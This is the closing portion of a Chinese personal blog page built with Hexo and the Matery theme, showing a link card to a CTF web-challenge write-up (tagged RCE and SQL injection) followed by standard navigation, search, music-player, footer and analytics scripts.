                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/13.jpg" class="responsive-img" alt="2025H&amp;NCTFweb题复现">
                        
                        <span class="card-title">2025H&amp;NCTFweb题复现</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2025-06-10
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/CTF/" class="post-category">
                                    CTF
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                    <a href="/tags/Web/">
                        <span class="chip bg-color">Web</span>
                    </a>
                    
                    <a href="/tags/RCE/">
                        <span class="chip bg-color">RCE</span>
                    </a>
                    
                    <a href="/tags/SQL%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">SQL注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2025-2026</span>
            
            <span id="year">2025</span>
            <a href="/about" target="_blank">Apzx7</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">44.5k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Apzx7" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:2182672468@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2182672468" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2182672468" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
